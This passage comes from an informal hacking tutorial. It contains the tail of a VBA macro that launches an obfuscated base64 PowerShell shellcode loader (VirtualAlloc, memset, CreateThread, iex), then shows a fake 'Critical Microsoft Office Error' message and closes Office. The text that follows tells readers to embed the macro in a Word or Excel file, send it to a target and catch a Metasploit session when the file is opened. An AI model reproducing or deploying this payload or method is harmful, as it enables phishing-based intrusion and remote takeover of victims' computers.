AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxA" _
& "DAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQ
AdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADA
ALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0Ab
ABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3
ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG
4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAI" _
& "AAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwA
MAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcg
B0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABl
AG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG
4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0A
OgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkA" _
& "DEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbg
B0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AI
AAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAd
wBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwA
dgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJA
AzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAb" _
& "wB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A"
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Yes it's really long I know :)
After that switch to a windows box and open microsoft word or microsoft exel. Go to the 'view' tab, select the macro's button
and then view macro's
Add a new macro (Just give it the name you want)and press create.
(You can do all this steps in one just Hit alt+F11).
Remove the things your document standard creates and paste in the generated macro code into the editor. Just close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled document) or WhateverYouWant.doc (Must be word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your metasploit listener on.
Bam you got a session and your target box is pwned just by opening a Document!
That was it for today guy's
Happy Hunting :)
@ClaimItToYou
PS if you want to Follow Me or David Kennedy(ReL1k) or trusted sec on twitter here are the links:
*https://twitter.com/hackingdave
*https://twitter.com/trustedsec
*https://twitter.com/ClaimItToYou